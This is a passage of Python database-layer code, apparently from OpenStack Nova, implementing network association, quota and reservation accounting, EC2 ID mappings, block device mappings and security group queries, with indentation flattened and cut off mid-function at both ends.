# in force mode or project doesn't have a network so associate
# with a new network
# get new network
network_ref = network_query(None, network_id)
if not network_ref:
raise exception.NoMoreNetworks()
# associate with network
# NOTE(vish): if with_lockmode isn't supported, as in sqlite,
# then this has concurrency issues
network_ref['project_id'] = project_id
session.add(network_ref)
return network_ref
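# Illustrative call patterns, with hypothetical `ctxt`, `project_id` and
# `net_id` values:
#
#     # associate only if the project does not already have a network
#     network_associate(ctxt, project_id)
#
#     # force association with a specific network regardless of existing ones
#     network_associate(ctxt, project_id, network_id=net_id, force=True)
#
# In the non-forced case an existing project network is simply returned;
# NoMoreNetworks is raised when no unassociated network (project_id is None)
# is available to claim.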
def _network_ips_query(context, network_id):
return model_query(context, models.FixedIp, read_deleted="no").\
filter_by(network_id=network_id)
@require_admin_context
def network_count_reserved_ips(context, network_id):
return _network_ips_query(context, network_id).\
filter_by(reserved=True).\
count()
@require_admin_context
def network_create_safe(context, values):
network_ref = models.Network()
network_ref['uuid'] = str(uuid.uuid4())
network_ref.update(values)
try:
network_ref.save()
return network_ref
except db_exc.DBDuplicateEntry:
raise exception.DuplicateVlan(vlan=values['vlan'])
@require_admin_context
def network_delete_safe(context, network_id):
session = get_session()
with session.begin():
result = model_query(context, models.FixedIp, session=session,
read_deleted="no").\
filter_by(network_id=network_id).\
filter_by(allocated=True).\
count()
if result != 0:
raise exception.NetworkInUse(network_id=network_id)
network_ref = _network_get(context, network_id=network_id,
session=session)
model_query(context, models.FixedIp, session=session,
read_deleted="no").\
filter_by(network_id=network_id).\
soft_delete()
session.delete(network_ref)
@require_admin_context
def network_disassociate(context, network_id, disassociate_host,
disassociate_project):
net_update = {}
if disassociate_project:
net_update['project_id'] = None
if disassociate_host:
net_update['host'] = None
network_update(context, network_id, net_update)
def _network_get(context, network_id, session=None, project_only='allow_none'):
result = model_query(context, models.Network, session=session,
project_only=project_only).\
filter_by(id=network_id).\
first()
if not result:
raise exception.NetworkNotFound(network_id=network_id)
return result
@require_context
def network_get(context, network_id, project_only='allow_none'):
return _network_get(context, network_id, project_only=project_only)
@require_context
def network_get_all(context, project_only):
result = model_query(context, models.Network, read_deleted="no",
project_only=project_only).all()
if not result:
raise exception.NoNetworksFound()
return result
@require_context
def network_get_all_by_uuids(context, network_uuids, project_only):
result = model_query(context, models.Network, read_deleted="no",
project_only=project_only).\
filter(models.Network.uuid.in_(network_uuids)).\
all()
if not result:
raise exception.NoNetworksFound()
    # check if the result contains all the networks
    # we are looking for
for network_uuid in network_uuids:
found = False
for network in result:
if network['uuid'] == network_uuid:
found = True
break
if not found:
if project_only:
raise exception.NetworkNotFoundForProject(
network_uuid=network_uuid, project_id=context.project_id)
raise exception.NetworkNotFound(network_id=network_uuid)
return result
# NOTE(vish): pylint complains because of the long method name, but
# it fits with the names of the rest of the methods
# pylint: disable=C0103
@require_admin_context
def network_get_associated_fixed_ips(context, network_id, host=None):
# FIXME(sirp): since this returns fixed_ips, this would be better named
# fixed_ip_get_all_by_network.
# NOTE(vish): The ugly joins here are to solve a performance issue and
# should be removed once we can add and remove leases
# without regenerating the whole list
vif_and = and_(models.VirtualInterface.id ==
models.FixedIp.virtual_interface_id,
models.VirtualInterface.deleted == 0)
inst_and = and_(models.Instance.uuid == models.FixedIp.instance_uuid,
models.Instance.deleted == 0)
session = get_session()
query = session.query(models.FixedIp.address,
models.FixedIp.instance_uuid,
models.FixedIp.network_id,
models.FixedIp.virtual_interface_id,
models.VirtualInterface.address,
models.Instance.hostname,
models.Instance.updated_at,
models.Instance.created_at,
models.FixedIp.allocated,
models.FixedIp.leased).\
filter(models.FixedIp.deleted == 0).\
filter(models.FixedIp.network_id == network_id).\
filter(models.FixedIp.allocated == True).\
join((models.VirtualInterface, vif_and)).\
join((models.Instance, inst_and)).\
filter(models.FixedIp.instance_uuid != None).\
filter(models.FixedIp.virtual_interface_id != None)
if host:
query = query.filter(models.Instance.host == host)
result = query.all()
data = []
for datum in result:
cleaned = {}
cleaned['address'] = datum[0]
cleaned['instance_uuid'] = datum[1]
cleaned['network_id'] = datum[2]
cleaned['vif_id'] = datum[3]
cleaned['vif_address'] = datum[4]
cleaned['instance_hostname'] = datum[5]
cleaned['instance_updated'] = datum[6]
cleaned['instance_created'] = datum[7]
cleaned['allocated'] = datum[8]
cleaned['leased'] = datum[9]
data.append(cleaned)
return data
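# Each element returned above is a plain dict of the form (values are
# illustrative only):
#
#     {'address': '10.0.0.3', 'instance_uuid': '...', 'network_id': 1,
#      'vif_id': 5, 'vif_address': 'fa:16:3e:...', 'instance_hostname': 'vm1',
#      'instance_updated': <datetime>, 'instance_created': <datetime>,
#      'allocated': True, 'leased': False}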
def network_in_use_on_host(context, network_id, host):
fixed_ips = network_get_associated_fixed_ips(context, network_id, host)
return len(fixed_ips) > 0
def _network_get_query(context, session=None):
return model_query(context, models.Network, session=session,
read_deleted="no")
@require_admin_context
def network_get_by_uuid(context, uuid):
result = _network_get_query(context).filter_by(uuid=uuid).first()
if not result:
raise exception.NetworkNotFoundForUUID(uuid=uuid)
return result
@require_admin_context
def network_get_by_cidr(context, cidr):
result = _network_get_query(context).\
filter(or_(models.Network.cidr == cidr,
models.Network.cidr_v6 == cidr)).\
first()
if not result:
raise exception.NetworkNotFoundForCidr(cidr=cidr)
return result
@require_admin_context
def network_get_all_by_host(context, host):
session = get_session()
fixed_host_filter = or_(models.FixedIp.host == host,
models.Instance.host == host)
fixed_ip_query = model_query(context, models.FixedIp.network_id,
base_model=models.FixedIp,
session=session).\
outerjoin((models.VirtualInterface,
models.VirtualInterface.id ==
models.FixedIp.virtual_interface_id)).\
outerjoin((models.Instance,
models.Instance.uuid ==
models.VirtualInterface.instance_uuid)).\
filter(fixed_host_filter)
# NOTE(vish): return networks that have host set
# or that have a fixed ip with host set
# or that have an instance with host set
host_filter = or_(models.Network.host == host,
models.Network.id.in_(fixed_ip_query.subquery()))
return _network_get_query(context, session=session).\
filter(host_filter).\
all()
@require_admin_context
def network_set_host(context, network_id, host_id):
session = get_session()
with session.begin():
network_ref = _network_get_query(context, session=session).\
filter_by(id=network_id).\
with_lockmode('update').\
first()
if not network_ref:
raise exception.NetworkNotFound(network_id=network_id)
# NOTE(vish): if with_lockmode isn't supported, as in sqlite,
# then this has concurrency issues
if not network_ref['host']:
network_ref['host'] = host_id
session.add(network_ref)
return network_ref['host']
@require_context
def network_update(context, network_id, values):
session = get_session()
with session.begin():
network_ref = _network_get(context, network_id, session=session)
network_ref.update(values)
try:
network_ref.save(session=session)
except db_exc.DBDuplicateEntry:
raise exception.DuplicateVlan(vlan=values['vlan'])
return network_ref
###################
@require_context
def quota_get(context, project_id, resource, user_id=None):
model = models.ProjectUserQuota if user_id else models.Quota
query = model_query(context, model).\
filter_by(project_id=project_id).\
filter_by(resource=resource)
if user_id:
query = query.filter_by(user_id=user_id)
result = query.first()
if not result:
if user_id:
raise exception.ProjectUserQuotaNotFound(project_id=project_id,
user_id=user_id)
else:
raise exception.ProjectQuotaNotFound(project_id=project_id)
return result
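# Illustrative lookups with hypothetical arguments: with a user_id the
# per-user quota table is consulted, without one the project-level table is
# used.
#
#     quota_get(ctxt, 'proj-1', 'instances')                 # models.Quota
#     quota_get(ctxt, 'proj-1', 'instances', user_id='u-1')  # ProjectUserQuota
#
# A missing row raises ProjectQuotaNotFound or ProjectUserQuotaNotFound
# respectively.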
@require_context
def quota_get_all_by_project_and_user(context, project_id, user_id):
nova.context.authorize_project_context(context, project_id)
user_quotas = model_query(context, models.ProjectUserQuota.resource,
models.ProjectUserQuota.hard_limit,
base_model=models.ProjectUserQuota).\
filter_by(project_id=project_id).\
filter_by(user_id=user_id).\
all()
result = {'project_id': project_id, 'user_id': user_id}
for quota in user_quotas:
result[quota.resource] = quota.hard_limit
return result
@require_context
def quota_get_all_by_project(context, project_id):
nova.context.authorize_project_context(context, project_id)
rows = model_query(context, models.Quota, read_deleted="no").\
filter_by(project_id=project_id).\
all()
result = {'project_id': project_id}
for row in rows:
result[row.resource] = row.hard_limit
return result
@require_context
def quota_get_all(context, project_id):
nova.context.authorize_project_context(context, project_id)
result = model_query(context, models.ProjectUserQuota).\
filter_by(project_id=project_id).\
all()
return result
@require_admin_context
def quota_create(context, project_id, resource, limit, user_id=None):
per_user = user_id and resource not in PER_PROJECT_QUOTAS
quota_ref = models.ProjectUserQuota() if per_user else models.Quota()
if per_user:
quota_ref.user_id = user_id
quota_ref.project_id = project_id
quota_ref.resource = resource
quota_ref.hard_limit = limit
try:
quota_ref.save()
except db_exc.DBDuplicateEntry:
raise exception.QuotaExists(project_id=project_id, resource=resource)
return quota_ref
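# Sketch of the per_user decision above, with hypothetical values and assuming
# 'fixed_ips' is listed in PER_PROJECT_QUOTAS: a per-user row is created only
# when a user_id is supplied *and* the resource is not per-project, e.g.
#
#     quota_create(ctxt, 'proj-1', 'instances', 10, user_id='u-1')
#         -> models.ProjectUserQuota row
#     quota_create(ctxt, 'proj-1', 'fixed_ips', 10, user_id='u-1')
#         -> models.Quota row (project level)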
@require_admin_context
def quota_update(context, project_id, resource, limit, user_id=None):
per_user = user_id and resource not in PER_PROJECT_QUOTAS
model = models.ProjectUserQuota if per_user else models.Quota
query = model_query(context, model).\
filter_by(project_id=project_id).\
filter_by(resource=resource)
if per_user:
query = query.filter_by(user_id=user_id)
result = query.update({'hard_limit': limit})
if not result:
if per_user:
raise exception.ProjectUserQuotaNotFound(project_id=project_id,
user_id=user_id)
else:
raise exception.ProjectQuotaNotFound(project_id=project_id)
###################
@require_context
def quota_class_get(context, class_name, resource):
result = model_query(context, models.QuotaClass, read_deleted="no").\
filter_by(class_name=class_name).\
filter_by(resource=resource).\
first()
if not result:
raise exception.QuotaClassNotFound(class_name=class_name)
return result
def quota_class_get_default(context):
rows = model_query(context, models.QuotaClass, read_deleted="no").\
filter_by(class_name=_DEFAULT_QUOTA_NAME).\
all()
result = {'class_name': _DEFAULT_QUOTA_NAME}
for row in rows:
result[row.resource] = row.hard_limit
return result
@require_context
def quota_class_get_all_by_name(context, class_name):
nova.context.authorize_quota_class_context(context, class_name)
rows = model_query(context, models.QuotaClass, read_deleted="no").\
filter_by(class_name=class_name).\
all()
result = {'class_name': class_name}
for row in rows:
result[row.resource] = row.hard_limit
return result
@require_admin_context
def quota_class_create(context, class_name, resource, limit):
quota_class_ref = models.QuotaClass()
quota_class_ref.class_name = class_name
quota_class_ref.resource = resource
quota_class_ref.hard_limit = limit
quota_class_ref.save()
return quota_class_ref
@require_admin_context
def quota_class_update(context, class_name, resource, limit):
result = model_query(context, models.QuotaClass, read_deleted="no").\
filter_by(class_name=class_name).\
filter_by(resource=resource).\
update({'hard_limit': limit})
if not result:
raise exception.QuotaClassNotFound(class_name=class_name)
###################
@require_context
def quota_usage_get(context, project_id, resource, user_id=None):
query = model_query(context, models.QuotaUsage, read_deleted="no").\
filter_by(project_id=project_id).\
filter_by(resource=resource)
if user_id:
if resource not in PER_PROJECT_QUOTAS:
result = query.filter_by(user_id=user_id).first()
else:
result = query.filter_by(user_id=None).first()
else:
result = query.first()
if not result:
raise exception.QuotaUsageNotFound(project_id=project_id)
return result
def _quota_usage_get_all(context, project_id, user_id=None):
nova.context.authorize_project_context(context, project_id)
query = model_query(context, models.QuotaUsage, read_deleted="no").\
filter_by(project_id=project_id)
result = {'project_id': project_id}
if user_id:
query = query.filter(or_(models.QuotaUsage.user_id == user_id,
models.QuotaUsage.user_id == None))
result['user_id'] = user_id
rows = query.all()
for row in rows:
if row.resource in result:
result[row.resource]['in_use'] += row.in_use
result[row.resource]['reserved'] += row.reserved
else:
result[row.resource] = dict(in_use=row.in_use,
reserved=row.reserved)
return result
@require_context
def quota_usage_get_all_by_project_and_user(context, project_id, user_id):
return _quota_usage_get_all(context, project_id, user_id=user_id)
@require_context
def quota_usage_get_all_by_project(context, project_id):
return _quota_usage_get_all(context, project_id)
def _quota_usage_create(context, project_id, user_id, resource, in_use,
reserved, until_refresh, session=None):
quota_usage_ref = models.QuotaUsage()
quota_usage_ref.project_id = project_id
quota_usage_ref.user_id = user_id
quota_usage_ref.resource = resource
quota_usage_ref.in_use = in_use
quota_usage_ref.reserved = reserved
quota_usage_ref.until_refresh = until_refresh
    # updated_at is needed for judging whether max_age has expired
quota_usage_ref.updated_at = timeutils.utcnow()
quota_usage_ref.save(session=session)
return quota_usage_ref
@require_admin_context
def quota_usage_update(context, project_id, user_id, resource, **kwargs):
updates = {}
for key in ['in_use', 'reserved', 'until_refresh']:
if key in kwargs:
updates[key] = kwargs[key]
result = model_query(context, models.QuotaUsage, read_deleted="no").\
filter_by(project_id=project_id).\
filter_by(resource=resource).\
filter(or_(models.QuotaUsage.user_id == user_id,
models.QuotaUsage.user_id == None)).\
update(updates)
if not result:
raise exception.QuotaUsageNotFound(project_id=project_id)
###################
def _reservation_create(context, uuid, usage, project_id, user_id, resource,
delta, expire, session=None):
reservation_ref = models.Reservation()
reservation_ref.uuid = uuid
reservation_ref.usage_id = usage['id']
reservation_ref.project_id = project_id
reservation_ref.user_id = user_id
reservation_ref.resource = resource
reservation_ref.delta = delta
reservation_ref.expire = expire
reservation_ref.save(session=session)
return reservation_ref
###################
# NOTE(johannes): The quota code uses SQL locking to ensure races don't
# cause under or over counting of resources. To avoid deadlocks, this
# code always acquires the lock on quota_usages before acquiring the lock
# on reservations.
def _get_user_quota_usages(context, session, project_id, user_id):
# Broken out for testability
rows = model_query(context, models.QuotaUsage,
read_deleted="no",
session=session).\
filter_by(project_id=project_id).\
filter(or_(models.QuotaUsage.user_id == user_id,
models.QuotaUsage.user_id == None)).\
with_lockmode('update').\
all()
return dict((row.resource, row) for row in rows)
def _get_project_quota_usages(context, session, project_id):
rows = model_query(context, models.QuotaUsage,
read_deleted="no",
session=session).\
filter_by(project_id=project_id).\
with_lockmode('update').\
all()
result = dict()
    # Get the total counts of in_use and reserved
for row in rows:
if row.resource in result:
result[row.resource]['in_use'] += row.in_use
result[row.resource]['reserved'] += row.reserved
result[row.resource]['total'] += (row.in_use + row.reserved)
else:
result[row.resource] = dict(in_use=row.in_use,
reserved=row.reserved,
total=row.in_use + row.reserved)
return result
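# Illustrative result shape with hypothetical numbers: if the project has two
# 'cores' usage rows (one per user) with in_use 2 and 3 and reserved 1 and 0,
# the function returns
#
#     {'cores': {'in_use': 5, 'reserved': 1, 'total': 6}, ...}
#
# i.e. usages are summed across all users of the project.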
@require_context
@_retry_on_deadlock
def quota_reserve(context, resources, project_quotas, user_quotas, deltas,
expire, until_refresh, max_age, project_id=None,
user_id=None):
elevated = context.elevated()
session = get_session()
with session.begin():
if project_id is None:
project_id = context.project_id
if user_id is None:
user_id = context.user_id
# Get the current usages
user_usages = _get_user_quota_usages(context, session,
project_id, user_id)
project_usages = _get_project_quota_usages(context, session,
project_id)
# Handle usage refresh
work = set(deltas.keys())
while work:
resource = work.pop()
# Do we need to refresh the usage?
refresh = False
if ((resource not in PER_PROJECT_QUOTAS) and
(resource not in user_usages)):
user_usages[resource] = _quota_usage_create(elevated,
project_id,
user_id,
resource,
0, 0,
until_refresh or None,
session=session)
refresh = True
elif ((resource in PER_PROJECT_QUOTAS) and
(resource not in user_usages)):
user_usages[resource] = _quota_usage_create(elevated,
project_id,
None,
resource,
0, 0,
until_refresh or None,
session=session)
refresh = True
elif user_usages[resource].in_use < 0:
# Negative in_use count indicates a desync, so try to
# heal from that...
refresh = True
elif user_usages[resource].until_refresh is not None:
user_usages[resource].until_refresh -= 1
if user_usages[resource].until_refresh <= 0:
refresh = True
elif max_age and (user_usages[resource].updated_at -
timeutils.utcnow()).seconds >= max_age:
refresh = True
# OK, refresh the usage
if refresh:
# Grab the sync routine
sync = QUOTA_SYNC_FUNCTIONS[resources[resource].sync]
updates = sync(elevated, project_id, user_id, session)
for res, in_use in updates.items():
# Make sure we have a destination for the usage!
if ((res not in PER_PROJECT_QUOTAS) and
(res not in user_usages)):
user_usages[res] = _quota_usage_create(elevated,
project_id,
user_id,
res,
0, 0,
until_refresh or None,
session=session)
if ((res in PER_PROJECT_QUOTAS) and
(res not in user_usages)):
user_usages[res] = _quota_usage_create(elevated,
project_id,
None,
res,
0, 0,
until_refresh or None,
session=session)
if user_usages[res].in_use != in_use:
LOG.debug(_('quota_usages out of sync, updating. '
'project_id: %(project_id)s, '
'user_id: %(user_id)s, '
'resource: %(res)s, '
'tracked usage: %(tracked_use)s, '
'actual usage: %(in_use)s'),
{'project_id': project_id,
'user_id': user_id,
'res': res,
'tracked_use': user_usages[res].in_use,
'in_use': in_use})
# Update the usage
user_usages[res].in_use = in_use
user_usages[res].until_refresh = until_refresh or None
# Because more than one resource may be refreshed
# by the call to the sync routine, and we don't
# want to double-sync, we make sure all refreshed
# resources are dropped from the work set.
work.discard(res)
# NOTE(Vek): We make the assumption that the sync
# routine actually refreshes the
# resources that it is the sync routine
# for. We don't check, because this is
# a best-effort mechanism.
# Check for deltas that would go negative
unders = [res for res, delta in deltas.items()
if delta < 0 and
delta + user_usages[res].in_use < 0]
# Now, let's check the quotas
# NOTE(Vek): We're only concerned about positive increments.
# If a project has gone over quota, we want them to
# be able to reduce their usage without any
# problems.
for key, value in user_usages.items():
if key not in project_usages:
project_usages[key] = value
overs = [res for res, delta in deltas.items()
if user_quotas[res] >= 0 and delta >= 0 and
(project_quotas[res] < delta +
project_usages[res]['total'] or
user_quotas[res] < delta +
user_usages[res].total)]
# NOTE(Vek): The quota check needs to be in the transaction,
# but the transaction doesn't fail just because
# we're over quota, so the OverQuota raise is
# outside the transaction. If we did the raise
# here, our usage updates would be discarded, but
# they're not invalidated by being over-quota.
# Create the reservations
if not overs:
reservations = []
for res, delta in deltas.items():
reservation = _reservation_create(elevated,
str(uuid.uuid4()),
user_usages[res],
project_id,
user_id,
res, delta, expire,
session=session)
reservations.append(reservation.uuid)
# Also update the reserved quantity
# NOTE(Vek): Again, we are only concerned here about
# positive increments. Here, though, we're
# worried about the following scenario:
#
# 1) User initiates resize down.
# 2) User allocates a new instance.
# 3) Resize down fails or is reverted.
# 4) User is now over quota.
#
# To prevent this, we only update the
# reserved value if the delta is positive.
if delta > 0:
user_usages[res].reserved += delta
# Apply updates to the usages table
for usage_ref in user_usages.values():
session.add(usage_ref)
if unders:
LOG.warning(_("Change will make usage less than 0 for the following "
"resources: %s"), unders)
if overs:
if project_quotas == user_quotas:
usages = project_usages
else:
usages = user_usages
usages = dict((k, dict(in_use=v['in_use'], reserved=v['reserved']))
for k, v in usages.items())
headroom = dict((res, user_quotas[res] -
(usages[res]['in_use'] + usages[res]['reserved']))
for res in user_quotas.keys())
# If quota_cores is unlimited [-1]:
# - set cores headroom based on instances headroom:
if user_quotas.get('cores') == -1:
if deltas['cores']:
hc = headroom['instances'] * deltas['cores']
headroom['cores'] = hc / deltas['instances']
else:
headroom['cores'] = headroom['instances']
# If quota_ram is unlimited [-1]:
# - set ram headroom based on instances headroom:
if user_quotas.get('ram') == -1:
if deltas['ram']:
hr = headroom['instances'] * deltas['ram']
headroom['ram'] = hr / deltas['instances']
else:
headroom['ram'] = headroom['instances']
raise exception.OverQuota(overs=sorted(overs), quotas=user_quotas,
usages=usages, headroom=headroom)
return reservations
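# Worked example of the over-quota check above, all numbers hypothetical:
# with project_quotas['cores'] = 20, project_usages['cores']['total'] = 18 and
# a requested delta of 4, the test 20 < 4 + 18 holds, so 'cores' lands in
# `overs`, no reservations are created, and OverQuota is raised with the
# computed headroom (user quota minus (in_use + reserved)). Negative deltas
# never trigger the check, so a project already over quota can still free
# resources.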
def _quota_reservations_query(session, context, reservations):
"""Return the relevant reservations."""
# Get the listed reservations
return model_query(context, models.Reservation,
read_deleted="no",
session=session).\
filter(models.Reservation.uuid.in_(reservations)).\
with_lockmode('update')
@require_context
@_retry_on_deadlock
def reservation_commit(context, reservations, project_id=None, user_id=None):
session = get_session()
with session.begin():
usages = _get_user_quota_usages(context, session, project_id, user_id)
reservation_query = _quota_reservations_query(session, context,
reservations)
for reservation in reservation_query.all():
usage = usages[reservation.resource]
if reservation.delta >= 0:
usage.reserved -= reservation.delta
usage.in_use += reservation.delta
reservation_query.soft_delete(synchronize_session=False)
@require_context
@_retry_on_deadlock
def reservation_rollback(context, reservations, project_id=None, user_id=None):
session = get_session()
with session.begin():
usages = _get_user_quota_usages(context, session, project_id, user_id)
reservation_query = _quota_reservations_query(session, context,
reservations)
for reservation in reservation_query.all():
usage = usages[reservation.resource]
if reservation.delta >= 0:
usage.reserved -= reservation.delta
reservation_query.soft_delete(synchronize_session=False)
@require_admin_context
def quota_destroy_all_by_project_and_user(context, project_id, user_id):
session = get_session()
with session.begin():
model_query(context, models.ProjectUserQuota, session=session,
read_deleted="no").\
filter_by(project_id=project_id).\
filter_by(user_id=user_id).\
soft_delete(synchronize_session=False)
model_query(context, models.QuotaUsage,
session=session, read_deleted="no").\
filter_by(project_id=project_id).\
filter_by(user_id=user_id).\
soft_delete(synchronize_session=False)
model_query(context, models.Reservation,
session=session, read_deleted="no").\
filter_by(project_id=project_id).\
filter_by(user_id=user_id).\
soft_delete(synchronize_session=False)
@require_admin_context
def quota_destroy_all_by_project(context, project_id):
session = get_session()
with session.begin():
model_query(context, models.Quota, session=session,
read_deleted="no").\
filter_by(project_id=project_id).\
soft_delete(synchronize_session=False)
model_query(context, models.ProjectUserQuota, session=session,
read_deleted="no").\
filter_by(project_id=project_id).\
soft_delete(synchronize_session=False)
model_query(context, models.QuotaUsage,
session=session, read_deleted="no").\
filter_by(project_id=project_id).\
soft_delete(synchronize_session=False)
model_query(context, models.Reservation,
session=session, read_deleted="no").\
filter_by(project_id=project_id).\
soft_delete(synchronize_session=False)
@require_admin_context
def reservation_expire(context):
session = get_session()
with session.begin():
current_time = timeutils.utcnow()
reservation_query = model_query(context, models.Reservation,
session=session, read_deleted="no").\
filter(models.Reservation.expire < current_time)
for reservation in reservation_query.join(models.QuotaUsage).all():
if reservation.delta >= 0:
reservation.usage.reserved -= reservation.delta
session.add(reservation.usage)
reservation_query.soft_delete(synchronize_session=False)
###################
def _ec2_volume_get_query(context, session=None):
return model_query(context, models.VolumeIdMapping,
session=session, read_deleted='yes')
def _ec2_snapshot_get_query(context, session=None):
return model_query(context, models.SnapshotIdMapping,
session=session, read_deleted='yes')
@require_context
def ec2_volume_create(context, volume_uuid, id=None):
"""Create ec2 compatible volume by provided uuid."""
ec2_volume_ref = models.VolumeIdMapping()
ec2_volume_ref.update({'uuid': volume_uuid})
if id is not None:
ec2_volume_ref.update({'id': id})
ec2_volume_ref.save()
return ec2_volume_ref
@require_context
def get_ec2_volume_id_by_uuid(context, volume_id):
result = _ec2_volume_get_query(context).\
filter_by(uuid=volume_id).\
first()
if not result:
raise exception.VolumeNotFound(volume_id=volume_id)
return result['id']
@require_context
def get_volume_uuid_by_ec2_id(context, ec2_id):
result = _ec2_volume_get_query(context).\
filter_by(id=ec2_id).\
first()
if not result:
raise exception.VolumeNotFound(volume_id=ec2_id)
return result['uuid']
@require_context
def ec2_snapshot_create(context, snapshot_uuid, id=None):
"""Create ec2 compatible snapshot by provided uuid."""
ec2_snapshot_ref = models.SnapshotIdMapping()
ec2_snapshot_ref.update({'uuid': snapshot_uuid})
if id is not None:
ec2_snapshot_ref.update({'id': id})
ec2_snapshot_ref.save()
return ec2_snapshot_ref
@require_context
def get_ec2_snapshot_id_by_uuid(context, snapshot_id):
result = _ec2_snapshot_get_query(context).\
filter_by(uuid=snapshot_id).\
first()
if not result:
raise exception.SnapshotNotFound(snapshot_id=snapshot_id)
return result['id']
@require_context
def get_snapshot_uuid_by_ec2_id(context, ec2_id):
result = _ec2_snapshot_get_query(context).\
filter_by(id=ec2_id).\
first()
if not result:
raise exception.SnapshotNotFound(snapshot_id=ec2_id)
return result['uuid']
###################
def _block_device_mapping_get_query(context, session=None,
columns_to_join=None, use_slave=False):
if columns_to_join is None:
columns_to_join = []
query = model_query(context, models.BlockDeviceMapping,
session=session, use_slave=use_slave)
for column in columns_to_join:
query = query.options(joinedload(column))
return query
def _scrub_empty_str_values(dct, keys_to_scrub):
"""Remove any keys found in sequence keys_to_scrub from the dict
if they have the value ''.
"""
for key in keys_to_scrub:
if key in dct and dct[key] == '':
del dct[key]
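# Illustrative behaviour with a hypothetical dict: given
# dct = {'volume_size': '', 'volume_id': 'abc'} and
# keys_to_scrub = ['volume_size'], the empty-string entry is removed in place,
# leaving {'volume_id': 'abc'}; non-empty values and unlisted keys are kept.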
def _from_legacy_values(values, legacy, allow_updates=False):
if legacy:
if allow_updates and block_device.is_safe_for_update(values):
return values
else:
return block_device.BlockDeviceDict.from_legacy(values)
else:
return values
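# Sketch of the conversion above; the field names are examples of the legacy
# block device mapping format and may not be exhaustive. A legacy dict such as
# {'device_name': '/dev/vdb', 'virtual_name': 'ephemeral0'} is passed through
# block_device.BlockDeviceDict.from_legacy() to obtain the new-style
# source_type/destination_type representation, unless allow_updates is set and
# block_device.is_safe_for_update() reports that the values already contain
# only safe, new-style fields, in which case they are returned unchanged.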
@require_context
def block_device_mapping_create(context, values, legacy=True):
_scrub_empty_str_values(values, ['volume_size'])
values = _from_legacy_values(values, legacy)
bdm_ref = models.BlockDeviceMapping()
bdm_ref.update(values)
bdm_ref.save()
return bdm_ref
@require_context
def block_device_mapping_update(context, bdm_id, values, legacy=True):
_scrub_empty_str_values(values, ['volume_size'])
values = _from_legacy_values(values, legacy, allow_updates=True)
query = _block_device_mapping_get_query(context).filter_by(id=bdm_id)
query.update(values)
return query.first()
def block_device_mapping_update_or_create(context, values, legacy=True):
_scrub_empty_str_values(values, ['volume_size'])
values = _from_legacy_values(values, legacy, allow_updates=True)
session = get_session()
with session.begin():
result = None
# NOTE(xqueralt): Only update a BDM when device_name was provided. We
# allow empty device names so they will be set later by the manager.
if values['device_name']:
query = _block_device_mapping_get_query(context, session=session)
result = query.filter_by(instance_uuid=values['instance_uuid'],
device_name=values['device_name']).first()
if result:
result.update(values)
else:
# Either the device_name doesn't exist in the database yet, or no
# device_name was provided. Both cases mean creating a new BDM.
result = models.BlockDeviceMapping(**values)
result.save(session=session)
# NOTE(xqueralt): Prevent from having multiple swap devices for the
# same instance. This will delete all the existing ones.
if block_device.new_format_is_swap(values):
query = _block_device_mapping_get_query(context, session=session)
query = query.filter_by(instance_uuid=values['instance_uuid'],
source_type='blank', guest_format='swap')
query = query.filter(models.BlockDeviceMapping.id != result.id)
query.soft_delete()
return result
@require_context
def block_device_mapping_get_all_by_instance(context, instance_uuid,
use_slave=False):
return _block_device_mapping_get_query(context, use_slave=use_slave).\
filter_by(instance_uuid=instance_uuid).\
all()
@require_context
def block_device_mapping_get_by_volume_id(context, volume_id,
columns_to_join=None):
return _block_device_mapping_get_query(context,
columns_to_join=columns_to_join).\
filter_by(volume_id=volume_id).\
first()
@require_context
def block_device_mapping_destroy(context, bdm_id):
_block_device_mapping_get_query(context).\
filter_by(id=bdm_id).\
soft_delete()
@require_context
def block_device_mapping_destroy_by_instance_and_volume(context, instance_uuid,
volume_id):
_block_device_mapping_get_query(context).\
filter_by(instance_uuid=instance_uuid).\
filter_by(volume_id=volume_id).\
soft_delete()
@require_context
def block_device_mapping_destroy_by_instance_and_device(context, instance_uuid,
device_name):
_block_device_mapping_get_query(context).\
filter_by(instance_uuid=instance_uuid).\
filter_by(device_name=device_name).\
soft_delete()
###################
def _security_group_create(context, values, session=None):
security_group_ref = models.SecurityGroup()
    # FIXME(devcamcar): Unless I do this, the rules relation fails with a lazy
    # load exception once save() is called. This will get cleaned up in the
    # next orm pass.
security_group_ref.rules
security_group_ref.update(values)
try:
security_group_ref.save(session=session)
except db_exc.DBDuplicateEntry:
raise exception.SecurityGroupExists(
project_id=values['project_id'],
security_group_name=values['name'])
return security_group_ref
def _security_group_get_query(context, session=None, read_deleted=None,
project_only=False, join_rules=True):
query = model_query(context, models.SecurityGroup, session=session,
read_deleted=read_deleted, project_only=project_only)
if join_rules:
query = query.options(joinedload_all('rules.grantee_group'))
return query
def _security_group_get_by_names(context, session, project_id, group_names):
"""Get security group models for a project by a list of names.
Raise SecurityGroupNotFoundForProject for a name not found.
"""
query = _security_group_get_query(context, session=session,
read_deleted="no", join_rules=False).\
filter_by(project_id=project_id).\
filter(models.SecurityGroup.name.in_(group_names))
sg_models = query.all()
if len(sg_models) == len(group_names):
return sg_models
# Find the first one missing and raise
group_names_from_models = [x.name for x in sg_models]
for group_name in group_names:
if group_name not in group_names_from_models:
raise exception.SecurityGroupNotFoundForProject(
project_id=project_id, security_group_id=group_name)
# Not Reached
@require_context
def security_group_get_all(context):
return _security_group_get_query(context).all()
@require_context
def security_group_get(context, security_group_id, columns_to_join=None):
query = _security_group_get_query(context, project_only=True).\
filter_by(id=security_group_id)
if columns_to_join is None:
columns_to_join = []
for column in columns_to_join:
if column.startswith('instances'):
query = query.options(joinedload_all(column))
result = query.first()
if not result:
raise exception.SecurityGroupNotFound(
security_group_id=security_group_id)
return result
@require_context
def security_group_get_by_name(context, project_id, group_name,
columns_to_join=None):
query = _security_group_get_query(context,
read_deleted="no", join_rules=False).\
filter_by(project_id=project_id).\
filter_by(name=group_name)
if columns_to_join is None:
columns_to_join = ['instances', 'rules.grantee_group']
for column in columns_to_join:
query = query.options(joinedload_all(column))
result = query.first()
if not result:
raise exception.SecurityGroupNotFoundForProject(
project_id=project_id, security_group_id=group_name)
return result
@require_context
def security_group_get_by_project(context, project_id):
return _security_group_get_query(context, read_deleted="no").\
filter_by(project_id=project_id).\
all()
@require_context
def security_group_get_by_instance(context, instance_uuid):
return _security_group_get_query(context, read_deleted="no").\
join(models.SecurityGroup.instances).\
filter_by(uuid=instance_uuid).\
all()
@require_context
def security_group_in_use(context, group_id):
session = get_session()
with session.begin():
# Are there any instances that haven't been deleted
# that include this group?
inst_assoc = model_query(context,
